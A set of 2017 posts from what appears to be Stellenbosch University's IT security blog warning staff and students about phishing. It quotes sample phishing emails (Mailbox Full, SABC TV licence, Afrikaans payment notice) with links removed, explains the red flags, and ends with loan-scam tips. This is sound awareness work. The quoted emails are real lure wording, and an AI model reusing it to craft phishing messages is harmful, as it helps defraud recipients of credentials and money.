MAILBOX FULL phishing message

Tuesday, August 15th, 2017

A phishing email with the subject MAILBOX FULL has been sent from an internal SU staff member’s account. (See below for example with links removed)

Remember that spear-phishing email always appears to come from a trusted source like a university address and because it might seem to come from someone we know personally, there is a greater potential danger. Note that even if it says Microsoft, there’s no indication of branding. Official communication from IT will always be branded and look the same. Also, note the multiple spelling errors and suspiciously bad language. 

Do NOT click on any of the included links in the email or enter your username or password. You should never do this at any time. If you follow the link and supply your information, it will be used by phishing criminals to gain access to your bank details. 

If you have any inquiries, please let us know by logging a request on ServiceNow or calling our Service Desk at 808 4367. For more information on this and other phishing attacks, refer to our blog and Twitter account.

From: SU Staff, Mev <>
Sent: Tuesday, 15 August 2017 12:18 PM
Subject: Mailbox Full

Your mailbox is full and you have 3 mails pending. kindly increase the storage capacity of your mailbox account. Increase the storage capacity by clicking below

             storage increase

Fill out the instruction in order to increase the storage capacity to continue using your email account inorder to avoid being disconnected.

©Copyright 2017 Microsoft

All Right Reserved.

More information on current phishing attack

Monday, August 7th, 2017

The university is in the middle of a serious spear-phishing attack and is the direct target of a group of criminals who have registered and set up a South African website to fool university users into providing their e-mail addresses, usernames and passwords. 

Undoubtedly the same criminal cartel is now using e-mail accounts that were compromised in the last attack. (This time a senior lecturer at Stellenbosch Campus) The registered a South African domain name and have disguised the website to look like the university’s WebMail Login page.

Spear phishing is an email-spoofing attack that targets a specific organization or individual like the university and is not typically initiated by random hackers, but by perpetrators out for financial gain. As with emails used in regular phishing expeditions, spear-phishing messages appear to come from a trusted source. This case a address. The apparent source of the email is likely to be an individual within the recipient’s own company — generally, someone in a position of authority — or from someone the target knows personally, thus its potential danger.

It is important that you do NOT click on any of the included links in the mail or enter your username or password. You should never do this at any time, as Information Technology would never ask you to do so!

Just because the mail looks legitimate and the web page *looks* like it is genuine, does not make it so.

If you have received mail that looks like this please immediately report it to the Information Technology Security Team using the following method:

Send the spam/phishing mail to

If you did click on the link of this phishing spam and unwittingly give the scammers your username, e-mail address and password you should immediately go to and change the passwords on ALL your university accounts (making sure the new password is completely different, and is a strong password that will not be easily guessed.) as well as changing the passwords on your social media and private email accounts (especially if you use the same passwords on these accounts.)

Please be careful out there. These criminals are now targeting the university, no doubt based on their past successes. Keep alert and on the lookout.

[Article by David Wiles]

Phishing email: SABC TV Licence payment request

Wednesday, July 26th, 2017

The SABC slogan goes: “Pay your TV licence. It’s the right thing to do” or something to that effect. Falling for this phishing scam, will NOT be the right thing to do.

This phishing scam from the “SABC” about payment of your TV Licence, is very clever as it uses a so-called encrypted-PDF to capture data like the victim’s ID Number, Passport Number or Company Registration number. Once the data is captured, it asks you for banking account details etc. to do the “payment” for a TV Licence. The data is captured by the PDF, which is then sent to a server controlled by the criminals, who will use it to defraud them of their money.

This is what the phishing email looks like (with the dangerous parts removed):

From: []
Sent: Monday, 24 July 2017 13:14
To: University, Address <> <>

Subject: SABC requires you to make payment on your TV license account

Please find attached correspondence for your attention. The attachment is password protect.

The password for the attachment will be one of the following three options:
1. Your ID Number
2. Your Passport Number
3. Your Company Registration Number

Kind Regards
LettersOnline Team

The PDF attachment will ask you for a password if you open it.  Do not open or enter any details on this PDF. The SABC will never send you an email with a link or attached file to demand that you pay your licence. Neither will they send an unbranded mail or with no personalised salutation.

[Article by David Wiles]

Phishing email in Afrikaans

Wednesday, July 19th, 2017

About a year ago a new version of the ABSA Bank phishing email hit the university email server. What was new about this version was that the email was in Afrikaans. Although the Afrikaans was not perfect with some spelling and grammar mistakes, it still could have fooled many people, because of the “familiarity” component.

Stellenbosch University still uses a lot of Afrikaans as its primary official communications medium, and many automated systems like the Financial system use Afrikaans to inform users of payments etc. While there is nothing wrong with this, phishing scammers have latched onto this and are now attempting to fool people into divulging their personal details using Afrikaans in their phishing e-mails.

We were warned early this morning about an email that was originating from UCT with dangerous content, and almost immediately the UCT phishing emails started arriving.

Here is what to look out for:

Mail will arrive from a forged or compromised “UCT address” that will look like this:

From: Anna Huang []
Sent: 19 July 2017 10:53 AM
To: Recipients <>
Subject: Re: betaling aan jou rekening


Vind aangehegte betalingsbewys.


Disclaimer – University of Cape Town This e-mail is subject to UCT policies and e-mail disclaimer published on our website at or obtainable from +27 21 650 9111. If this e-mail is not related to the business of UCT, it is sent by the sender in an individual capacity. Please report security incidents or abuse via

The disclaimer from the University and the Afrikaans could fool some people if they are not careful.

The dangerous part is actually an attached html files (sometimes it might look like a PDF) that will present you with a login page where you will be asked to give your e-mail address and your password to “view this payment”

The login page will look like this, in this version:

The actual server’s address is also hidden by encoding it, so to the untrained eye, nothing will look suspicious. This is a typical phishing scam, but with the “sender” coming from a neighbouring academic institution, and the language being Afrikaans, we need to be even more alert.

[Article by David Wiles]



Warning about DirectAxis Financial Services spam

Wednesday, July 19th, 2017

There have been reports of personnel and students getting numerous “spam” messages from DirectAxis Financial Services offering financial loans at 5% interest. This email is sent from a number of  “throwaway” e-mail addresses like, Hotmail and

Some students and personal are struggling to manage their finances and these “offers” can be very tempting.

There are usually attached PDFs with each message where the company advertises loans and abnormally low-interest rates, and although currently there is no embedded malware or links to servers where you would be asked to give your user name and password, the spammers nevertheless ask you for your ID NUMBER, Full Names, Occupation, Monthly income and Contact details, which can be used for identity theft.

Although DirectAxis is a legitimate South African microlender, in the past, their company letterhead has been forged and used by criminals to commit fraud. Secondly, this particular Company has a number of charges against it by the Direct Marketing Association of South Africa for using ”spam databases” to spam millions of South Africans with their adverts. This puts them in violation of the “Protection of Personal Information Act” []

Don’t be fooled by companies offering you loans at a ridiculously low-interest rate (Here are some handy tips to spot frauds)

  • Any company that says it doesn’t care about your credit history has no intention of lending you money. A legitimate lending institution wants to know whether you pay your bills on time and in full. It needs some assurance that you’ll repay what you borrow.
  • Search the business’ website for an address where it legally does business. Lenders and loan brokers must be registered in the country where they conduct business.
  • One should never pay to get a personal loan. Many scammers ask borrowers to provide a prepaid debit card for insurance, collateral or fees.
  • Make sure a padlock icon appears somewhere on the web pages where you’re asked to type in personal information. Don’t override any warning saying a site’s security certificate has expired and pay attention to the URLs you click on.
  • When you find a lender online, go through the site to determine its physical location. Do they provide a street address? However it may be a fake! If you don’t find any indication of their location, you should avoid the lender.
  • Some websites appear to offer different types of personal loans but aren’t actually lenders, but sell your personal information to other loan companies. Many “microlenders” merely collect your personal and financial information for other companies.
  • Don’t fall for the “Act Now” urgency plea. Many criminals often give you a deadline and say their offer won’t exist tomorrow.

[Article by David Wiles]


© 2013-2017 Disclaimer: The views and opinions expressed in this page are strictly those of the page author(s) and content contributor(s). The contents of this page have not been reviewed or approved by Stellenbosch University.